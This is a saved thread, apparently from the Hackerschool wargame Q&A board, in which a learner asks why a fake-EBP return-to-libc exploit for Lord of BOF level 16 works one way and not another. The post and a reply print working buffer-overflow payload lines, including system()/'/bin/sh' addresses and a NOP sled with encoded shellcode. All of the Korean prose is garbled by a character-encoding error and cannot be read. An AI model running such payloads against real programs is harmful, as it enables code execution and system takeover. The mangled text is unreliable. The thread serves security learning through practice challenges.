·¹º§ ÇØÅ·

 2844, 7/143 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   incaro
   [LOB] LEVEL16 - FAKE EBP ¹®Á¦ Áú¹®.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=3216 [º¹»ç]


¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬
1) FAKE EBP¸¦ ¹öÆÛÀÇ ½ÃÀÛ ÁÖ¼Ò·Î ÇÏ¿© RTL ÇÏ¸é ¼º°ø
[ "AAAA" ] + [system()] + [exit()] + ["/bin/sh"] + [NOP*24] + [fake ebp:(buffer)] + [leave;let]
--------------------------------------------------------------------------------------------------------------
$(python -c 'print "AAAA" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "\x90"*24 + "\xb0\xfa\xff\xbf" + "\x32\x85\x04\x08"')
¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ
2) FAKE EBP¸¦ argv[2]·Î ÇÏ¿© RTL ÇÏ¸é ½ÇÆÐ.
ARGV[1]::([ "D"*40 ] + [fake ebp:(argv[2])] + [leave;ret])  
ARGV[2]::(["AAAA"] + [system()] + [exit()] + ["/bin/sh"])
--------------------------------------------------------------------------------------------------------------
$(python -c 'print "D"*40 + "\x48\xfc\xff\xbf" + "\x32\x85\x04\x08"') $(python -c 'print "AAAA" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬
¡Ø(À§ÀÇ leave;ret ÁÖ¼Ò´Â »çº» ÁÖ¼Ò ÀÔ´Ï´Ù)

¡Ø 1¹øÀº µÇ°í 2¹øÀº ¾ÈµË´Ï´Ù. (ÁÖ¼Ò°¡ Ʋ¸±½Ã Segmentation fault°¡ ³ªÁö¸¸ ¿¡·¯µµ ¾ø½À´Ï´Ù.)
ÀÌÀ¯¸¦ ¸ð¸£°Ú³×¿ä.

  Hit : 2922     Date : 2011/06/11 07:18



    
¸Û¸Û À̰͵µ ³»ÀÏ ´äº¯ µå¸±²²¿ä~ ½Ã°£ÀÌ ³Ñ ´Ê¾î¼­~~ 2011/07/04  
¸Û¸Û ÀÌ·² ¶© gdb¸¦ ºÙ¿©¼­ instruction ´ÜÀ§·Î ÄÚµå È帧À» µû¶ó°¡¸ç ¹®Á¦Á¡À» ã¾Æº¸¼¼¿é! 2011/07/06  
¸Û¸Û Âü°í·Î Á¦°¡ »ç¿ëÇß´ø payloadÀÔ´Ï´Ù Àúµµ argv[2]¸¦ ½è¾ú±¸¿ä~

./zombie_assassin `perl -e 'printf "\xe7\xfb\xff\xbf"x10 . "\xb0\xfb\xff\xbf" . "\xdf\x84\x04\x08"'` `perl -e 'printf "\x90"x50 . "\xb8\xb8\x91\x2e\x55\x31\xc9\xd9\xc3\xd9\x74\x24\xf4\xb1\x0b\x5d\x31\x45\x13\x03\x45\x13\x83\xed\xfc\xe2\x4d\xfb\x25\x0d\x34\xae\x5f\xc5\x6b\x2c\x29\xf2\x1b\x9d\x5a\x95\xdb\x89\xb3\x07\xb2\x27\x45\x24\x16\x50\x5d\xab\x96\xa0\x71\xc9\xff\xce\xa2\x7e\x97\x0e\xea\xd3\xee\xee\xd9\x54"'`

\xb8\xb8 .... Àº Æò¹üÇÑ ½©ÄÚµåÀÔ´Ï´Ù
2011/07/06  
2724   LOB FC4 ŸÀÌź ¤Ð¤Ð [3]     ¿ìÀ×22
07/17 3318
2723   webhacking.kr 21¹ø ¹®Á¦[1]     jaewonm
07/11 5836
2722   [lord of bof FC4] titan Áú¹®ÀÖ½À´Ï´Ù!!!!!! Á¦¹ß[3]     ¿ìÀ×22
07/04 3479
2721   level11->level12 ¿¡¼­ ¸·Èü´Ï´Ù. ÇÏ·çÁ¾ÀÏ À̰Ÿ¸ º¸³×¿ä.....[6]     ozdang
07/01 2331
  [LOB] LEVEL16 - FAKE EBP ¹®Á¦ Áú¹®.[3]     incaro
06/11 2921
2719   Level 1¿¡¼­ level2 ±ÇÇÑ¿¡ ´ëÇÑ Áú¹®[3]     yootaeil
06/09 2917
2718   lob fc4 Enimga ³Ê¹« ¾î·Á¿ö¿ä ~!!!     ¿ìÀ×22
06/02 3101
2717   LOB Áú¹®]] ¿Ö! 16ByteÀÌ¿©¾ß Çϴ°¡.[7]     incaro
06/01 3078
2716   webhacking.kr ¼Ò½ºº¸°í³ª¼­[1]     Ǭ¼ö¿ÕÀÚ
06/01 2507
2715   LOB Áú¹® µå·Á¿ä. (BASH2)[1]     incaro
05/23 3624
2714   LOB FC4°¡ ¶ÇÀÖ³ª¿ä?     chofly
05/22 2558
2713   LOB FC4 enigma ÈùÆ® Á» ÁÖ¼¼¿ä     ¿ìÀ×22
05/17 3965
2712   [¹®Á¦ Level11]¾î¶²½©ÄÚµå´ÂµÇ°í ¾î¶²°Ç ¾ÈµÇ°í... ÇÞ°¥¸®³×¿ä..[2]     incaro
05/16 3089
2711   µµ´ëü... Level11Àº level10°ú ¿ÖÀÌ·¸°Ô Áö½ÄÂ÷ÀÌ°¡ ³ª´Â°ÅÁÒ;[1]     darkofgy
05/15 2556
2710   LOB ½ÃÀÛÇߴµ¥¿ä ...[4]     w7040
05/08 2420
2709   Level8 ±×³É Çѹø °í¹ÎÇß´ø°É ¾ê±âÇغ¾´Ï´Ù     ÀÌÇö¹è
04/29 2299
2708   ·¹º§ 5->·¹º§6 °úÁ¤¿¡¼­ suid°¡ ÇØÁ¦µÇ¾îÀÖ½À´Ï´Ù..[4]     traciare
04/28 2310
2707   FC3¿¡¼­ GOT¿À¹ö¶óÀÌÆà Áú¹®ÀÖ½À´Ï´Ù..,[2]     ¿ìÀ×22
04/25 3761
2706   lob fc3 fgets·Î ÀԷ¹޴ ¿À¹öÇ÷οì°ü·Ã Áú¹®ÀÖ½À´Ï´Ù.[3]     ¿ìÀ×22
04/14 4257
2705   ftz ¸¦ ÇÏ´Ù°¡ ¸®´ª½º¸¦ ±ò¾Æ¤²¤È¤µ´Âµ¥ [3]     yangseungjin
04/11 2573
[1][2][3][4][5][6] 7 [8][9][10]..[143]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org